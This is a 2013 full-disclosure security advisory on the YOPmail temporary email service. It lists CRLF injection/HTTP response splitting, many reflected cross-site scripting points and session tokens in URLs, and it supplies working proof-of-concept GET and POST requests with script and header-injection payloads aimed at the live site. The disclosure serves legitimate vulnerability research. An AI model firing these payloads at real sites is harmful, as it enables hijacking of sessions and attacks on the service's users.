YOPMail suffers from cross site scripting, HTTP response splitting, CRLF injection, and session token handling vulnerabilities.
695a2946cc39df0b7ae62aedfd486a14f8ffc15c2fc2ef1b909e0eeccfa856ae
YOPMAIL(Anonymous&Free email address) CRLF Injection-HTTP Response Spliting/XSS/Session Token in URL
==================================================================================================================================================
Report-Timeline:
================
2013-06-01: Researcher Notification
2013-06-03: RESPONSE
2013-06-07: Ask About the issues
2013-06-10: Vendor Feedback
2013-06-13: Not Fixed
2013-06-16: Ask About the Issues
2013-06-27: Not Fixed / Not Response
2013-06-28: Full Disclosure
I-VULNERABILITIES
======================
#Title: YOPMAIL(Anonymous&Free email address) YopMail CRLFInjection-HTTP Response Spliting / XSS/ Session Token in URL /
#Vendor:http://www.yopmail.com
#Author:Juan Carlos García (@secnight)
#Follow me
http://www.highsec.es
http://hackingmadrid.blogspot.com
Twitter:@secnight
II-Introduction:
======================
YOPmail (Your Own Protection mail) is a temporary e-mail service. They keep a message up for 8 days.
It's possibble to send a message to another YOPmail address mail. No registration required. Firefox, Internet Explorer 7 and Opera add-ons are
downloadable. There are alternate domains.
Domains
@yopmail.fr
@yopmail.net
@cool.fr.nf
@jetable.fr.nf
@nospam.ze.tc
@nomail.xl.cx
@mega.zik.dj
@speed.1s.fr
@courriel.fr.nf
@moncourrier.fr.nf
@monemail.fr.nf
@monmail.fr.nf
@mail.mezimages.net
The site has new domains every three months.
III-PROOF OF CONCEPT
======================
CRLF INJECTION-HTTP RESPONSE SPLITING
______________________________________
The CRLF Injection Attack (sometimes also referred to as HTTP Response Splitting) is a fairly simple, yet extremely powerful web attack. Hackers
are actively exploiting this web application vulnerability to perform a large variety of attacks that include XSS cross-site scripting, cross-user
defacement, positioning of client's web-cache, hijacking of web pages, defacement and a myriad of other related attacks
Attacks
-------
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&PHPSESSID=m8aqum8ibtq1v47ql9l5cs40h5&r=211
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=524
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_secnight&r=919
http://www.yopmail.com:80/cr.php?cfg=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&r=717
Multiple CROSS SITE SCRIPTING
_______________________________
The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a
manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
Attacks
--------
Below I expose a few vulnerabilities because many failures of this type in this web service... So much XSS..
Affected items
/add-domain.php
/alternate-domains.php
/alternate-email-address.php
/conditions.php
/contact.php
/definitions/email-jetable.php
/definitions/mail-anonyme.php
/definitions/spam.php
/donation.php
/email-anonyme.php
/email-generator.php
/en
/en/add-domain.php
/en/alternate-domains.php
/en/alternate-email-address.php
/en/conditions.php
/en/contact.php
/en/definitions
/en/definitions/email-jetable.php
/en/definitions/mail-anonyme.php
/en/definitions/spam.php
/en/donation.php
/en/email-anonyme.php
/en/email-generator.php
/en/faq.php
/en/images
/en/index.php
/en/plugins.php
/en/privacy.php
/en/send-mail.php
/en/style
/en/style/pic
/en/yopmail-chat.php
/es
/es/add-domain.php
/es/alternate-domains.php
/es/alternate-email-address.php
/es/conditions.php
/es/contact.php
/es/definitions
/es/definitions/email-jetable.php
/es/definitions/mail-anonyme.php
/es/definitions/spam.php
/es/donation.php
/es/email-anonyme.php
/es/email-generator.php
/es/faq.php
/es/images
/es/index.php
/es/plugins.php
/es/privacy.php
/es/send-mail.php
/es/style
/es/style/pic
/es/yopmail-chat.php
/faq.php
/fr
/fr/add-domain.php
/fr/alternate-domains.php
/fr/alternate-email-address.php
/fr/conditions.php
/fr/contact.php
/fr/definitions
/fr/definitions/email-jetable.php
/fr/definitions/mail-anonyme.php
/fr/definitions/spam.php
/fr/donation.php
/fr/email-anonyme.php
/fr/email-generator.php
/fr/faq.php
/fr/images
/fr/index.php
/fr/plugins.php
/fr/privacy.php
/fr/send-mail.php
/fr/style
/fr/style/pic
/fr/yopmail-chat.php
/index.php
/it
/it/add-domain.php
/it/alternate-domains.php
/it/alternate-email-address.php
/it/conditions.php
/it/contact.php
/it/definitions
/it/definitions/email-jetable.php
/it/definitions/mail-anonyme.php
/it/definitions/spam.php
/it/donation.php
/it/email-anonyme.php
/it/email-generator.php
/it/faq.php
/it/images
/it/index.php
/it/plugins.php
/it/privacy.php
/it/send-mail.php
/it/style
/it/style/pic
/it/yopmail-chat.php
/pl
/pl/add-domain.php
/pl/alternate-domains.php
/pl/alternate-email-address.php
/pl/conditions.php
/pl/contact.php
/pl/definitions
/pl/definitions/email-jetable.php
/pl/definitions/mail-anonyme.php
/pl/definitions/spam.php
/pl/donation.php
/pl/email-anonyme.php
/pl/email-generator.php
/pl/faq.php
/pl/images
/pl/index.php
/pl/plugins.php
/pl/privacy.php
/pl/send-mail.php
/pl/style
/pl/style/pic
/pl/yopmail-chat.php
/plugins.php
/privacy.php
/ru
/ru/add-domain.php
/ru/alternate-domains.php
/ru/alternate-email-address.php
/ru/conditions.php
/ru/contact.php
/ru/definitions
/ru/definitions/email-jetable.php
/ru/definitions/mail-anonyme.php
/ru/definitions/spam.php
/ru/donation.php
/ru/email-anonyme.php
/ru/email-generator.php
/ru/faq.php
/ru/images
/ru/index.php
/ru/plugins.php
/ru/privacy.php
/ru/send-mail.php
/ru/style
/ru/style/pic
/ru/yopmail-chat.php
/send-mail.php
/uk
/uk/add-domain.php
/uk/alternate-domains.php
/uk/alternate-email-address.php
/uk/conditions.php
/uk/contact.php
/uk/definitions
/uk/definitions/email-jetable.php
/uk/definitions/mail-anonyme.php
/uk/definitions/spam.php
/uk/donation.php
/uk/email-anonyme.php
/uk/email-generator.php
/uk/faq.php
/uk/images
/uk/index.php
/uk/plugins.php
/uk/privacy.php
/uk/send-mail.php
/uk/style
/uk/style/pic
/uk/yopmail-chat.php
/yopmail-chat.php
/zh
/zh/add-domain.php
/zh/alternate-domains.php
/zh/alternate-email-address.php
/zh/conditions.php
/zh/contact.php
/zh/definitions
/zh/definitions/email-jetable.php
/zh/definitions/mail-anonyme.php
/zh/definitions/spam.php
/zh/donation.php
/zh/email-anonyme.php
/zh/email-generator.php
/zh/faq.php
/zh/images
/zh/index.php
/zh/plugins.php
/zh/privacy.php
/zh/send-mail.php
/zh/style
/zh/style/pic
/zh/yopmail-chat.php
Method GET
----------
http://www.yopmail.com/zh/send-mail.php?act=n&login=secnight%27%28%highsec
http://www.yopmail.com/fr/send-mail.php?act=n&login=secnight%27%Highsec
http://www.yopmail.com/send-mail.php?act=n&login=secnight%27%28%hackingmadrid
http://www.yopmail.com/en/style/pic/1%3CScRiPt%3Eprompt(989053)%3C/ScRiPt%3E
http://www.yopmail.com/fr/images/1%3CScRiPt%3Eprompt(911745)%3C/ScRiPt%3E
http://www.yopmail.com/fr/1%3CScRiPt%3Eprompt(969668)%3C/ScRiPt%3E
http://www.yopmail.com/en/plugins.php/%22onmouseover=prompt(908426)%3E
http://www.yopmail.com/fr/alternate-email-address.php/%22onmouseover=prompt(958732)%3E
http://www.yopmail.com/en/images/1%3CScRiPt%3Eprompt(908060)%3C/ScRiPt%3E
Method POST
------------
http://www.yopmail.com:80/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=946977%27%28%29929310&mailfromalt=secnight.highsec-
1oiflzkn&mailsu=secnight@email.tst&mailto=secnight@email.tst&mailtxt=secnight@email.tst
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=999095%27%28%29985487&mailfromalt=eric.parker-
dj9fvk3&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=950091%27%28%29972125&mailfromalt=fred.turner-
7ov0wsxm&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-1oiflzkn&mailsu=%22%20onmouseover%3dprompt
%28939071%29%20bad%3d%22&mailto=sample@email.tst&mailtxt=sample@email.tst
http://www.yopmail.com:80/zh/send-mail.php
Request Data
act=n&chkalt=chkalt&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=932669%27%28%29998492&mailfromalt=elsa.watson-
0ojziwig&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
SESSION TOKEN IN URL
____________________
This application contains a session token in the query parameters. A session token is sensitive information and should not be stored in the URL.
URLs could be logged or leaked via the Referer header.
Affected items
--------------
/cr.php (78a3a31e275b316f36665b35eb4bfe21)
/email-anonyme.php (2945f0f7603424f6b0d1a0413b7af0f1)
/email-anonyme.php (37a90c7caa8d08bb2a8ca5b5591cbdd3)
/email-anonyme.php (f508baf21a69429be4914c4008baf8ca)
/en/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/es/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/fr/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/it/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/pl/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/ru/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/uk/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
/zh/email-anonyme.php (dd55a78c73365d3f13cd525db45a7604)
Examples
Method GET
----------
http://www.yopmail.com/cr.inc.php?cfg=0&sn=PHPSESSID&
http://www.yopmail.com/es/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/fr/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/it/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/pl/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/ru/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/uk/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
http://www.yopmail.com/zh/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Method POST
-----------
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalwaysalt=chkalwaysalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-
1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
/email-anonyme.php?PHPSESSID=osb56hetusbk2ifqdcg5642qs6
Request Data
act=&chkalt=chkalt&code=94102&mailfrom=anonyme&mailfromalt=john.thomas-
1oiflzkn&mailsu=sample@email.tst&mailto=sample@email.tst&mailtxt=sample@email.tst
IV. CREDITS
-------------------------
This vulnerabilities has been discovered
by Juan Carlos García(@secnight)
V. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage
caused by the use or misuse of this information.